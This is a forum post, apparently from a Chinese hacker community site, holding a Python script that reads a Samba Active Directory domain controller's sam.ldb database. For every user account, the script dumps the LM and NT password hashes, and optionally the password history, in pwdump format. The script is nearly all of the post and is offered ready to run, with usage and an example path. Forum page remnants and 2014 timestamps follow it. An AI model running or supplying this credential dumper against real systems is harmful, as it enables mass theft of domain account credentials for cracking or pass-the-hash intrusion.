|
|
- #!/usr/bin/env python
- def get_history(attr, r):
- hashes = []
- if attr in r:
- hist = r[attr][0]
- for i in range(0, len(hist), 16):
- h = hist[i:i+16].encode('hex')
- hashes.append(h)
- return hashes
- def get_hash(attr, r):
- if attr not in r:
- return ''
- else:
- return r[attr][0].encode('hex')
- from samba.ndr import ndr_unpack
- from samba.dcerpc import security
- from ldb import Ldb
- from sys import argv, exit
- if len(argv) not in (2, 3):
- print('Usage: %s <path to .ldb> [-history]' % argv[0])
- print("Exmpl: %s '/var/lib/samba/private/sam.ldb.d/DC=SECURUS,DC=CORP,DC=COM.ldb'" % argv[0])
- exit(2)
- for r in Ldb(argv[1]).search(expression='(objectclass=user)'):
- rid = ndr_unpack(security.dom_sid, r['objectSid'][0]).split()[-1]
- username = r['sAMAccountName']
- lmhash = get_hash('dBCSPwd', r)
- nthash = get_hash('unicodePwd', r)
- print('%s:%s:%s:%s:::' % (username, rid, lmhash, nthash))
- if len(argv) == 3 and argv[2] == '-history':
- lmhistory = get_history('lmPwdHistory', r)
- nthistory = get_history('ntPwdHistory', r)
- for i, (lmhash, nthash) in enumerate(map(lambda l,n: (l,n) if l else ('',n), lmhistory[1:], nthistory[1:])):
- print('%s_history%d:%s:%s:%s:::' % (username, i, rid, lmhash, nthash))
|
|
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2014-10-3 07:35:45
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
发表于 2014-10-7 20:39:57